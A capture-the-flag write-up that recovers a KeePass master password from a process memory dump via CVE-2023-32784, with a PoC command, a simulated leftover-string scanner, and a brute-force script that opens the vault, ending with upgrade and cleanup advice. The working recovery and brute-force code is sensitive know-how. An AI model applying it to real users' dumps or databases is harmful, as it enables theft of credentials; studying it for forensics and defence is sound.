Unlocked
Forensics | Hard | 400 points
Recuite 2025 - HCMUS
October 6, 2025
Tags: KeePass, CVE-2023-32784, Memory Dump, Password Recovery

Unlocked - Writeup

Challenge Information

  • Category: Forensics
  • Files: Database.kdbx, KeePass.DMP (272MB)
  • Vulnerability: CVE-2023-32784

Overview

CVE-2023-32784 is a KeePass 2.x flaw (fixed in 2.54) that lets anyone holding a memory dump of the KeePass process recover all but the first character of the master password. The challenge hands us exactly that: a locked database and a 272 MB process dump, so the task is to pull the password out of the dump and brute-force the small remainder.

Understanding CVE-2023-32784

The Vulnerability

KeePass 2.x reads the master password through a custom control, SecureTextBoxEx, and that control is the source of the leak:

  • For every character typed, the control builds a new string made of one ● per previously typed character followed by the new character.
  • .NET strings are immutable and the garbage collector does not zero freed memory, so each of these intermediate strings stays behind in the process heap.
  • Typing "Password" leaves behind: ●a, ●●s, ●●●s, ●●●●w, ●●●●●o, ●●●●●●r, ●●●●●●●d
  • The first character never appears in any leftover string, so it is lost; every later character is recoverable by reading the strings in order of bullet count.
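The following is an added example, not code from the writeup or from either PoC: it simulates the leftover strings SecureTextBoxEx produces, embeds them in a constructed byte buffer standing in for a process dump, and then recovers the password pattern the way the PoCs do, by scanning for runs of ● (U+25CF, bytes CF 25 in UTF-16LE) followed by one character. The filler bytes and the "typing session" helper are assumptions made for the example; the scan and the ordering by bullet count are the actual technique.

```python
import re
from collections import defaultdict

# SecureTextBoxEx masks typed characters with U+25CF (●); .NET strings are UTF-16LE.
BULLET = "\u25cf"
BULLET_LE = BULLET.encode("utf-16-le")          # b"\xcf\x25"

# One run of ● followed by exactly one printable ASCII character (UTF-16LE code unit).
LEFTOVER_RE = re.compile(rb"((?:\xcf\x25)+)([\x20-\x7e])\x00")


def leftover_strings(typed: str) -> list[bytes]:
    """Simulate the strings left in memory after typing `typed` into the box.
    For the i-th keystroke (i >= 1) the box builds "●"*i + char, so the first
    character never appears in any leftover string."""
    return [(BULLET * i + typed[i]).encode("utf-16-le") for i in range(1, len(typed))]


def build_fake_dump(*typed_inputs: str) -> bytes:
    """Constructed stand-in for a process dump: leftovers from one or more
    typing sessions separated by filler bytes (assumption; not real KeePass memory)."""
    filler = b"\x00" * 6 + "junk".encode("utf-16-le") + b"\x00" * 2
    chunks = []
    for typed in typed_inputs:
        for leftover in leftover_strings(typed):
            chunks.append(leftover)
            chunks.append(filler)
    return b"".join(chunks)


def recover_candidates(dump: bytes) -> dict[int, set[str]]:
    """Scan a dump for ●-runs and collect, per 0-based password position,
    every character that followed a run of that length."""
    found: dict[int, set[str]] = defaultdict(set)
    for m in LEFTOVER_RE.finditer(dump):
        position = len(m.group(1)) // 2          # number of ● = index of the char
        found[position].add(m.group(2).decode("ascii"))
    return dict(found)


def render(candidates: dict[int, set[str]]) -> str:
    """Render like the PoC output: ● for the unrecoverable first character,
    a single char where unambiguous, {a|b} where several leftovers disagree."""
    if not candidates:
        return ""
    out = [BULLET]
    for pos in range(1, max(candidates) + 1):
        chars = sorted(candidates.get(pos, set()))
        if len(chars) == 1:
            out.append(chars[0])
        elif chars:
            out.append("{" + "|".join(chars) + "}")
        else:
            out.append("?")
    return "".join(out)


if __name__ == "__main__":
    # A clean session recovers everything but the first character.
    print(render(recover_candidates(build_fake_dump("Password"))))      # ●assword
    # An earlier mistyped second character leaves a rival candidate at position 1,
    # which is why real dumps often yield several options for the second character.
    print(render(recover_candidates(build_fake_dump("P'", "Password"))))  # ●{'|a}ssword
```

The regex only accepts printable ASCII after the bullets; a password containing non-ASCII characters would need the second group widened to any non-zero UTF-16 code unit. The order of the bullet runs inside the dump does not matter, only their length, which is what makes the recovery robust against heap fragmentation.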

Impact

  • Works on any memory artifact that captured the process: process dumps, pagefile/swap, hibernation files, crash dumps, full RAM images
  • Works regardless of whether the workspace is locked
  • No code execution on the victim is required; read access to the artifact is enough
  • Can still work after KeePass has been closed, with decreasing reliability as the freed memory is reused

Exploitation

Step 1: Extract Password Pattern

git clone https://github.com/CMEPW/keepass-dump-masterkey.git
python3 keepass-dump-masterkey/poc.py KeePass.DMP

Output:

Possible password: ●y_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
Possible password: ●'_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce
...
Possible password: ●&_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce

Analysis:

  • First character: unknown (●), never written to any leftover string
  • Second character: 10 candidates (y, ', e, \, {, space, C, (, S, &), because several one-bullet strings were found in the dump
  • Remaining: _super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce, recovered unambiguously
  • Note: "confidental" is how the password was actually typed; do not "correct" it to "confidential" when brute-forcing

Step 2: Bruteforce First Two Characters

import string

from pykeepass import PyKeePass
from pykeepass.exceptions import CredentialsError

# Everything after the second character was recovered verbatim by the PoC.
suffix = "_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce"
# Second-character candidates, in the order the PoC printed them.
second_chars = ['y', "'", 'e', '\\', '{', ' ', 'C', '(', 'S', '&']
# The first character is never recoverable: try every printable ASCII character
# (string.printable minus its trailing whitespace, 94 characters).
first_chars = string.printable.strip()

found = None
for first in first_chars:
    for second in second_chars:
        password = first + second + suffix
        try:
            kp = PyKeePass('Database.kdbx', password=password)
        except CredentialsError:
            continue  # wrong master key, try the next candidate
        found = password
        print(f"SUCCESS! Password: {password}")
        break
    if found:
        break

Total: at most 94 × 10 = 940 attempts, each costing one KDF run against the database header
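As an added example (not the writeup's own code), the following generalises Step 2: it parses the "Possible password:" lines that poc.py prints, builds the candidate set for every position rather than hardcoding one suffix, enumerates the search space, and runs the brute force against a pluggable opener so the logic can be checked offline. The sample PoC output is constructed here from the ten second-character candidates the analysis above lists; the `pykeepass_opener` helper is the only part that needs the real Database.kdbx and pykeepass.

```python
from __future__ import annotations

import itertools
import string
from collections.abc import Callable, Iterator

BULLET = "\u25cf"  # ● printed by poc.py for the unrecoverable first character

# Constructed sample in the shape poc.py prints: one line per second-character
# candidate from the writeup's analysis. Not output from a real dump.
SAMPLE_POC_OUTPUT = "".join(
    f"Possible password: {BULLET}{c}_super_secret_&_super_duper_long_"
    f"confidental_key_that_you_cannot_bruteforce\n"
    for c in ["y", "'", "e", "\\", "{", " ", "C", "(", "S", "&"]
)

# string.printable minus its trailing whitespace: 94 characters. A password
# starting with a space or tab would be missed; widen this if that is plausible.
FIRST_CHARS = string.printable.strip()


def parse_poc_output(text: str) -> list[list[str]]:
    """Turn 'Possible password: ●...' lines into per-position candidate lists
    (index 0 = the character right after the lost first one), keeping the
    order in which the PoC printed them."""
    prefix = "Possible password: " + BULLET
    per_pos: list[list[str]] = []
    for line in text.splitlines():
        if not line.startswith(prefix):
            continue
        for i, ch in enumerate(line[len(prefix):]):
            if i == len(per_pos):
                per_pos.append([])
            if ch not in per_pos[i]:
                per_pos[i].append(ch)
    return per_pos


def candidate_passwords(per_pos: list[list[str]],
                        first_chars: str = FIRST_CHARS) -> Iterator[str]:
    """Every first character combined with every choice at the other positions."""
    for combo in itertools.product(list(first_chars), *per_pos):
        yield "".join(combo)


def candidate_count(per_pos: list[list[str]], first_chars: str = FIRST_CHARS) -> int:
    total = len(first_chars)
    for choices in per_pos:
        total *= len(choices)
    return total


def brute_force(per_pos: list[list[str]], try_open: Callable[[str], bool],
                first_chars: str = FIRST_CHARS) -> tuple[str | None, int]:
    """Try candidates in order until try_open accepts one.
    Returns (password, attempts); (None, attempts) if none worked."""
    attempts = 0
    for pw in candidate_passwords(per_pos, first_chars):
        attempts += 1
        if try_open(pw):
            return pw, attempts
    return None, attempts


def pykeepass_opener(path: str) -> Callable[[str], bool]:
    """Opener for a real .kdbx; imports pykeepass lazily so the rest of the
    file runs without it. CredentialsError is what pykeepass raises on a bad key."""
    from pykeepass import PyKeePass
    from pykeepass.exceptions import CredentialsError

    def try_open(pw: str) -> bool:
        try:
            PyKeePass(path, password=pw)
            return True
        except CredentialsError:
            return False
    return try_open


if __name__ == "__main__":
    per_pos = parse_poc_output(SAMPLE_POC_OUTPUT)
    print("search space:", candidate_count(per_pos))              # 940
    # Offline check with a stand-in for the database (assumed known password).
    known = "my_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce"
    print(brute_force(per_pos, lambda pw: pw == known))           # (known, 221)
    # Against the real file: brute_force(per_pos, pykeepass_opener("Database.kdbx"))
```

Because 'm' is the 23rd character of string.printable and 'y' is the first second-character candidate, the known password is reached on attempt 22 × 10 + 1 = 221, which matches the "~200 attempts" observed in the writeup. Ordering first_chars by likelihood (lowercase letters first, for example) would shorten the expected search further.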

Step 3: Database Unlocked!

Password found after ~200 attempts ('m' is the 23rd character of string.printable and 'y' the first second-character candidate, so 22 × 10 + 1 = 221 tries):

my_super_secret_&_super_duper_long_confidental_key_that_you_cannot_bruteforce

Step 4: Extract Flag

Title   Username      Password
Flag    blackpinker   BPCTF{r3memb3r_2_upgr4de_k33pa5s_7o_v3rsion_2.54}

Flag

BPCTF{r3memb3r_2_upgr4de_k33pa5s_7o_v3rsion_2.54}

Reminder: Upgrade to KeePass 2.54+ which fixes this vulnerability!

Key Takeaways

Vulnerability Details

  1. Affects KeePass 2.x before 2.54
  2. Caused by SecureTextBoxEx building its masked text with immutable .NET strings that the garbage collector never zeroes
  3. Only the first character is lost; every later one is recoverable, and the number of ● in each leftover string gives its position
  4. Works on any memory artifact (process dump, pagefile, hiberfil.sys, crash dump, RAM image)
  5. Locking the workspace does not prevent the attack

Defense

  • Update KeePass to 2.54+ immediately
  • Change the master password if it was ever typed into an affected version
  • Clean memory artifacts that may still hold the old password:
    • Delete crash dumps
    • Delete the hibernation file (hiberfil.sys)
    • Delete the pagefile/swapfile
    • Overwrite free disk space so deleted dump files cannot be carved back
    • Restart the computer so the old process memory is released

Affected vs Not Affected

Affected: KeePass 2.X (< 2.54) written in .NET

Not Affected:

  • KeePass 2.54+
  • KeePass 1.X
  • KeePassXC
  • Other non-.NET implementations

Tools

  1. Python PoC: https://github.com/CMEPW/keepass-dump-masterkey (used in Step 1)
  2. PyKeePass: Python library used to open the database and read its entries
  3. Original C# PoC: vdohney/keepass-password-dumper, the reference implementation the Python port follows

Timeline

  • May 2023: vulnerability disclosed and CVE-2023-32784 assigned
  • June 2023: KeePass 2.54 released with fix
  • October 2025: This CTF challenge